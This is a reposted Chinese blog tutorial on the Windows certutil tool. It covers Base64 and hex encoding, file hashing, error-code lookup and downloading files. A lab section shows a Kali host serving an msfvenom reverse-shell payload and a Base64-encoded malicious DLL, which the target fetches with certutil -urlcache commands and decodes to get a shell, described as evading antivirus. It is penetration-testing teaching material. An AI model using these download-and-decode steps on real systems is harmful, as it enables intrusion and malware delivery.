[转帖]Certutil工具(Windows命令行下载常用)

certutil,工具,windows,命令行,下载,常用 · 浏览次数 : 0

小编点评

**Certutil 是一个用于转换和显示证书颁发机构 (CA),配置信息,证书服务,CA组件的备份和还原以及验证证书,密钥对和证书链的工具。** **它可以用于:** * 校验文件 MD5,SHA1,SHA256。 * 下载恶意文件和免杀 Certutil。 * 配置证书服务。 * 验证证书,密钥对和证书链。 **它作为证书服务的一部分安装,可以在系统启动时自动启动。** **由于它的功能可以用于恶意攻击,因此它可以成为一个攻击工具。** **当使用 Certutil 时,需要注意以下安全问题:** * 编码参数 (编码) 可以用于隐藏恶意代码。 * 恶意文件可以被编码以绕过安全软件的检测。 * 攻击者可以使用已隐藏在证书文件中的可移植可执行文件来隐藏扫描攻击的证据。

正文

工具介绍

certutil是windows下一款下载文件的工具,自从WindowsServer2003就自带,但是在Server 2003使用会有问题,也就是说,以下命令是在Win7及其以后的机器中使用。其功能可校验文件MD5,SHA1,SHA256,下载恶意文件和免杀
Certutil
Certutil是一个CLI程序,可用于转储和显示证书颁发机构(CA),配置信息,证书服务,CA组件的备份和还原以及验证证书,密钥对和证书链,它作为证书服务的一部分安装
在这里插入图片描述
作为系统工具的它为什么会成为一个攻击工具(后门)?看下面演示

功能介绍

编码

Certutil包含一个编码参数(编码)。这有助于在Base64中编码文件的内容。这是在Windows中等效于Linux中的base64命令。
不能打开.exe可执行文件时候,可以使用certutil对可执行文件进行编码。然后传输编码后的数据,然后在接收机上对其进行解码。
这里创建一个名为test.txt的文本文件,输入一些内容,打开powershell
命令:Add-Content test.txt “ni hao”
type .\test.txt
在这里插入图片描述
编码(base64)
命令:certutil -encode test.txt encode.txt
type .\encode.txt
在这里插入图片描述
编码(十六进制)
命令:certutil -encodehex test.txt encode2.txt
type .\encode2.txt
在这里插入图片描述

解码

解码(base64)
命令:type .\encode.txt
certutil -decode encode.txt decode.txt
Type .\decode.txt
在这里插入图片描述
解码(十六进制)
在这里插入图片描述

散列

获取数据并传递固定长度的输出字符串。使用哈希加密算法,例如MD5,SHA-1,SHA-256,可以验证两个文件是否相同。该校验和用于执行检查的散列值的数据完整性,这是一种文件签名。通过比较校验和,我们可以识别重复文件。
命令:certutil -hashfile生成指定哈希值
命令:certutil -hashfile test.txt md5(生成md5)
在这里插入图片描述
命令:certutil -hashfile test.txt sha1(生成sha1)
在这里插入图片描述
命令:certutil -hashfile test.txt sha256(生成sha256)
在这里插入图片描述

下载

certutil还可用于从互联网下载文件
这里从服务器下载xss.js
在这里插入图片描述
命令:certutil.exe -urlcache -split -f http://服务器ip:8000/xss.js
在这里插入图片描述
在这里插入图片描述

系统错误代码

Certutil可以帮助你找到系统错误代码的消息文本,查看系统错误代码的含义
命令:certutil -error 8200
在这里插入图片描述
命令:certutil -error 0x200
在这里插入图片描述

使用Certutil进行渗透测试

环境:攻击机(kali 192.168.211.129)
靶机(win7 192.168.211.128)

Certutil可在未经任何验证或评估的情况下主动从Internet下载文件

Certutil可用于将文件从一个系统复制到另一个系统,以在攻击过程中横向移动一些攻击工具或其他文件
这里用msf中的msfvenom生成一个反向链接负载
在这里插入图片描述
通过python传输
在这里插入图片描述
同时kali机器msf开启监听
在这里插入图片描述
在靶机上通过certutil下载该文件并运行
在这里插入图片描述
返回查看监听
在这里插入图片描述
成功反弹shell
在这里插入图片描述
成功使用certutil和恶意可执行文件来Getshell

提交恶意DLL编码

Certutil可对文件进行base64编码,攻击者可以使用经过混淆的文件来隐藏扫描攻击的证据,然后再解码这些文件,这就是certutil发挥作用的地方,可以解码数据并避免杀毒软件的察觉。Certutil还可以用于解码已隐藏在证书文件中的可移植可执行文件。
有效载荷可以被编码或加密,以避免被检测
还是生成有效负载,有效负载的格式在动态链接库文件.dll中设置,命名为dll.txt
在这里插入图片描述
开起监听
在这里插入图片描述
在靶机上下载该文件,并且谨慎进行,文件被下载为文本文件且被编译成另一个文本文件,此时下载的是两个文件
命令:certutil -urlcache -split -f http://192.168.211.129:8000/dll.txt | certutil -encode dll.txt edll.txt
在这里插入图片描述
然后进行解码并保存在exploit.dll(杀毒软件不会察觉),运行dll
在这里插入图片描述
查看监听
在这里插入图片描述
成功使用certutil和恶意编码的可执行文件Getshell

参考链接:https://zhuanlan.zhihu.com/p/107819644

与[转帖]Certutil工具(Windows命令行下载常用)相似的内容:

[转帖]Certutil工具(Windows命令行下载常用)

工具介绍 certutil是windows下一款下载文件的工具,自从WindowsServer2003就自带,但是在Server 2003使用会有问题,也就是说,以下命令是在Win7及其以后的机器中使用。其功能可校验文件MD5,SHA1,SHA256,下载恶意文件和免杀 Certutil Certu

[转帖]windows certutil工具

https://www.cnblogs.com/superlazybug/p/16448659.html 最近在项目上,有个功能的入口是字符串的SHA1值,所以打桩跑的时候,经常需要自己计算SHA1,开始使用的是python 的hashlib ,能满足日常使用 后来发现,windows 自带的cer

[转帖]certutil

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil Certutil.exe is a command-line program, installed as part of

[转帖]CertUtil: -hashfile 失败: 0xd00000bb (-805306181)

https://www.cnblogs.com/heenhui2016/p/de.html 使用CertUtil验证Python安装文件的时候出现了这个错误。 CertUtil: -hashfile 失败: 0xd00000bb (-805306181) 代码是这样 1 certutil -hash

[转帖]

Linux ubuntu20.04 网络配置(图文教程) 因为我是刚装好的最小系统,所以很多东西都没有,在开始配置之前需要做下准备 环境准备 系统:ubuntu20.04网卡:双网卡 网卡一:供连接互联网使用网卡二:供连接内网使用(看情况,如果一张网卡足够,没必要做第二张网卡) 工具: net-to

[转帖]

https://cloud.tencent.com/developer/article/2168105?areaSource=104001.13&traceId=zcVNsKTUApF9rNJSkcCbB 前言 Redis作为高性能的内存数据库,在大数据量的情况下也会遇到性能瓶颈,日常开发中只有时刻

[转帖]ISV 、OSV、 SIG 概念

ISV 、OSV、 SIG 概念 2022-10-14 12:29530原创大杂烩 本文链接:https://www.cndba.cn/dave/article/108699 1. ISV: Independent Software Vendors “独立软件开发商”,特指专门从事软件的开发、生产、

[转帖]Redis 7 参数 修改 说明

2022-06-16 14:491800原创Redis 本文链接:https://www.cndba.cn/dave/article/108066 在之前的博客我们介绍了Redis 7 的安装和配置,如下: Linux 7.8 平台 Redis 7 安装并配置开机自启动 操作手册https://ww

[转帖]HTTPS中间人攻击原理

https://www.zhihu.com/people/bei-ji-85/posts 背景 前一段时间,公司北京地区上线了一个HTTPS防火墙,用来监听HTTPS流量。防火墙上线之前,邮件通知给管理层,我从我老大那里听说这个事情的时候,说这个有风险,然后意外地发现,很多人原来都不知道HTTPS防

[转帖]关于字节序(大小端)的一点想法

https://www.zhihu.com/people/bei-ji-85/posts 今天在一个技术群里有人问起来了,当时有一些讨论(不完全都是我个人的观点),整理一下: 为什么网络字节序(多数情况下)是大端? 早年设备的缓存很小,先接收高字节能快速的判断报文信息:包长度(需要准备多大缓存)、地